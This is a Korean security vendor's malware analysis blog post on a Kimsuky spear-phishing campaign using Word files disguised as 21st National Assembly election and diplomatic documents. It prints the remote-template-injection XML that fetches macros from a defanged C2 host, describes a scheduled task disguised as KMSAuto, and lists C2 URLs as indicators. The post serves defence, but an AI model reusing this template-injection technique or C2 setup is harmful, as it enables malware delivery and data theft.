상세 컨텐츠

본문 제목

김수키(Kimsuky)조직, 21대 국회의원 선거문서로 사칭한 스모크 스크린 APT 공격 수행

악성코드 분석 리포트

by 알약(Alyac) 2020. 4. 10. 09:06

본문



안녕하세요. 이스트시큐리티 ESRC(시큐리티 대응센터)입니다.


김수키(Kimsuky) 조직의 '스모크 스크린' 캠페인의 일환으로 추정되는 공격이 또 한번 포착되어 사용자들의 주의가 필요합니다. 


이번 공격에 사용된 악성 파일은 '21대 국회의원 선거 관련.docx', '외교문서 관련(이재춘국장).docx' 파일을 위장하고 있습니다. 


이번에 발견된 두 개의 악성 워드파일들의 파일명은 다르지만, 동작방식은 동일합니다. 


먼저 악성 DOCX 문서가 실행되면, 아래와 같은 내부 'settings.xml.rels' 명령이 작동하고, 악성 매크로 함수실행을 위해 특정 미리네 호스팅 C2 서버로 통신을 시도합니다.



<?xml version="1.0" encoding="UTF-8" standalone="yes"?>

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="http://saemaeul[.]mireene.com/skin/board/basic/bin" TargetMode="External"/>

</Relationships>



DOCX 문서 파일의 작성자는 'seong jin lee' 이름이 등록되어 있으며, 마지막 수정자는 'Robot Karll' 입니다.



<dc:creator>seong jin lee</dc:creator>

<cp:keywords/>

<dc:description/>

<cp:lastModifiedBy>Robot Karll</cp:lastModifiedBy>

<cp:revision>6</cp:revision>

<cp:lastPrinted>2020-04-01T07:10:00Z</cp:lastPrinted>

<dcterms:created xsi:type="dcterms:W3CDTF">2020-04-01T06:01:00Z</dcterms:created>

<dcterms:modified xsi:type="dcterms:W3CDTF">2020-04-03T00:14:00Z</dcterms:modified>

</cp:coreProperties>



그리고 다음과 같이 [콘텐츠 사용] 버튼 클릭을 유도하는 문구를 보여줍니다. 만약 C2 서버와 통신이 실패하면 [콘텐츠 사용] 버튼은 나타나지 않습니다.



[그림 1] C2 서버 'saemaeul.mireene[.]com 서버와 통신해 매크로 실행 유도하는 과정

 


사용자가 [콘텐츠 사용] 버튼을 클릭해 실행하면, 사용자에게는 다음과 같은 워드문서의 내용이 보이게 됩니다.   



[그림 2] 21대 국회의원 선거 관련 내용이 담긴 악성 문서 화면



[그림 3] 외교 및 총선 관련 내용이 담긴 악성 문서 화면 



악성 매크로가 실행되면, '.NETFramework4.xml' 파일 이름으로 추가 명령을 생성합니다.



[그림 4] XML 내부 화면



그리고 윈도우 운영체제 정품인증 키관리 서비스(Key Management Service)처럼 KMSAuto 이름으로 작업 스케줄러에 등록해 자동으로 실행되도록 설정합니다.



[그림 5] 작업스케줄러 명령어 화면



C2 명령제어 서버와 다음과 같이 통신을 시도하며, 공격자의 추가 명령에 따라 다양한 정보유출이 진행될 수 있습니다.



http://saemaeul.mireene[.]com/skin/board/basic/bin

http://saemaeul.mireene[.]com/skin/board/basic/bin/report.php

http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=1

http://saemaeul.mireene[.]com/skin/board/basic/bin/down.php?op=2


http://saemaeul.mireene[.]com/skin/visit/basic/log

http://saemaeul.mireene[.]com/skin/visit/basic/log/report.php

http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=1

http://saemaeul.mireene[.]com/skin/visit/basic/log/down.php?op=2



올해 초부터 김수키(Kimsuky) 조직은 국내 기업/기관 등을 대상으로 지속적으로 스모크 스크린 캠페인을 벌이고 있습니다. 



※ 스모크스크린 관련글

- 2020년 01월, 통일외교안보특보 발표문건 사칭 스피어피싱 

- 2020년 02월, 코로나 바이러스 대응 지시사항 문건사칭 스피어피싱 

- 2020년 03월, 비건 미국무부 부장관 서신내용 사칭



이에 기업 및 기관 사용자들의 각별한 주의가 필요합니다. 


현재 알약에서는 해당 악성코드에 대해 Exploit.MSOffice.Gen, Trojan.Agent.183268E로 탐지중에 있습니다. 


관련 IoC는 쓰렛인싸이드에서 확인하실 수 있습니다. 




저작자표시

'악성코드 분석 리포트' 카테고리의 다른 글

비너스락커 조직, 또 다시 Makop 랜섬웨어 변종 유포 중!  (0) 2020.04.13
애플 사용자를 대상으로 한 피싱 공격 주의!!  (0) 2020.04.10
코로나 이슈 '긴급재난자금' 상품권을 사칭한 스미싱 공격 주의!  (0) 2020.04.09
코로나19 바이러스 키워드로 국내 기업에 유입중인 영문 이메일 주의!  (0) 2020.04.08
경찰청을 사칭하여 유포중인 악성 이메일 주의!  (0) 2020.04.08

관련글 더보기

댓글 영역

티스토리툴바